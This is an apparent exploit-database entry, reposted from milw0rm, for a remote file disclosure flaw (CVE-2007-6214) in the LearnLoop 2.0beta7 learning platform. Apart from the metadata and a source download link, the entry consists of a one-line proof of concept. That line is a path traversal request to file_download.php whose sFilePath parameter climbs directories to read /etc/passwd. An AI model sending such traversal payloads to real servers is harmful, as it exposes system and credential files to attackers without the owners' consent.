LearnLoop 2.0beta7 - 'sFilePath' Remote File Disclosure



EKU-ID: 12634 CVE: OSVDB-39698;CVE-2007-6214 OSVDB-ID:
Author: GoLd_M Published: 2007-11-29 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


LearnLoop 2.0beta7 (sFilePath) Remote File Disclosure Vulnerability
http://surfnet.dl.sourceforge.net/sourceforge/learnloop/learnloop2.0beta7.tar.gz
POC : /include/file_download.php?sFilePath=../../../../../../../etc/passwd

# milw0rm.com [2007-11-29]